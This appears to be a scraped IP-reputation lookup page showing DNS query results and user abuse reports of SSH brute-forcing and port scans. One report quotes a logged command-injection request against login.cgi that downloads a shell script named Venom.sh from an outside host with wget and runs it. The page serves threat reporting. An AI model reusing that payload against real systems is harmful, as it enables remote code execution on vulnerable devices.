Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States of America (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 55.157.89.150
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 49854
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;55.157.89.150.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025012500 1800 900 604800 86400

;; Query time: 44 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Jan 25 23:27:29 CST 2025
;; MSG SIZE  rcvd: 106
Host info
Host 150.89.157.55.in-addr.arpa not found: 2(SERVFAIL)
Nslookup info:
server can't find 55.157.89.150.in-addr.arpa: SERVFAIL
Related IP info:
Related comments:
IP Type Details Datetime
115.159.75.157 attackbots
Dec 23 14:39:52 gw1 sshd[15308]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.75.157
Dec 23 14:39:55 gw1 sshd[15308]: Failed password for invalid user gdm from 115.159.75.157 port 47248 ssh2
...
2019-12-23 21:18:20
103.99.0.97 attackbots
[portscan] tcp/22 [SSH]
[scan/connect: 4 time(s)]
in blocklist.de:'listed [ssh]'
*(RWIN=8192)(12231244)
2019-12-23 20:52:40
103.22.250.194 attackbotsspam
C1,WP GET /suche/2019/wp-login.php
2019-12-23 21:25:28
206.189.26.171 attack
Dec 23 13:13:12 MK-Soft-Root1 sshd[27246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.26.171 
Dec 23 13:13:14 MK-Soft-Root1 sshd[27246]: Failed password for invalid user bots123 from 206.189.26.171 port 44082 ssh2
...
2019-12-23 21:02:31
122.228.11.42 attack
Invalid user popcorn from 122.228.11.42 port 44806
2019-12-23 21:21:28
190.85.15.251 attack
Dec 23 09:52:27 work-partkepr sshd\[7202\]: Invalid user komb from 190.85.15.251 port 56153
Dec 23 09:52:27 work-partkepr sshd\[7202\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.85.15.251
...
2019-12-23 20:48:16
51.158.120.115 attack
Dec 23 13:46:42 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: Invalid user n-yamaguchi from 51.158.120.115
Dec 23 13:46:42 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.158.120.115
Dec 23 13:46:44 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: Failed password for invalid user n-yamaguchi from 51.158.120.115 port 39700 ssh2
Dec 23 13:51:57 vibhu-HP-Z238-Microtower-Workstation sshd\[8665\]: Invalid user etholen from 51.158.120.115
Dec 23 13:51:57 vibhu-HP-Z238-Microtower-Workstation sshd\[8665\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.158.120.115
...
2019-12-23 20:42:57
156.217.162.11 attackbots
1 attack on wget probes like:
156.217.162.11 - - [22/Dec/2019:15:57:27 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 21:08:14
222.186.175.202 attackspambots
Dec 23 13:46:37 sd-53420 sshd\[32619\]: User root from 222.186.175.202 not allowed because none of user's groups are listed in AllowGroups
Dec 23 13:46:37 sd-53420 sshd\[32619\]: Failed none for invalid user root from 222.186.175.202 port 31924 ssh2
Dec 23 13:46:38 sd-53420 sshd\[32619\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.202  user=root
Dec 23 13:46:40 sd-53420 sshd\[32619\]: Failed password for invalid user root from 222.186.175.202 port 31924 ssh2
Dec 23 13:46:43 sd-53420 sshd\[32619\]: Failed password for invalid user root from 222.186.175.202 port 31924 ssh2
...
2019-12-23 20:53:48
108.46.78.101 attack
Dec 23 07:25:06 h2177944 kernel: \[281083.777689\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3079 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 
Dec 23 07:25:06 h2177944 kernel: \[281083.777705\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3079 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 
Dec 23 07:25:07 h2177944 kernel: \[281084.762099\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3080 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 
Dec 23 07:25:07 h2177944 kernel: \[281084.762115\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3080 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 
Dec 23 07:25:09 h2177944 kernel: \[281086.760424\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.11
2019-12-23 20:51:16
222.186.173.238 attack
Dec 23 13:40:21 sd-53420 sshd\[30416\]: User root from 222.186.173.238 not allowed because none of user's groups are listed in AllowGroups
Dec 23 13:40:22 sd-53420 sshd\[30416\]: Failed none for invalid user root from 222.186.173.238 port 23416 ssh2
Dec 23 13:40:22 sd-53420 sshd\[30416\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.173.238  user=root
Dec 23 13:40:24 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2
Dec 23 13:40:28 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2
...
2019-12-23 20:46:58
92.119.160.143 attackbotsspam
ET CINS Active Threat Intelligence Poor Reputation IP group 93 - port: 61462 proto: TCP cat: Misc Attack
2019-12-23 21:18:49
201.182.32.189 attack
<6 unauthorized SSH connections
2019-12-23 20:43:52
80.227.68.4 attackbots
Dec 23 13:22:02 silence02 sshd[4460]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.227.68.4
Dec 23 13:22:04 silence02 sshd[4460]: Failed password for invalid user 123456 from 80.227.68.4 port 42966 ssh2
Dec 23 13:29:28 silence02 sshd[4679]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.227.68.4
2019-12-23 21:22:42
2001:41d0:303:5e44:: attackbots
10 attempts against mh-misc-ban on heat.magehost.pro
2019-12-23 21:09:20

Recently Reported IPs

233.108.203.122 147.182.151.108 225.223.105.209 9.139.87.30
40.102.14.123 60.129.129.205 237.228.51.159 12.155.127.0
75.146.164.47 190.84.64.79 244.158.111.29 198.222.240.229
55.56.121.46 132.249.208.209 149.236.172.83 90.166.186.83
78.50.197.117 60.79.53.208 203.32.156.12 108.114.53.233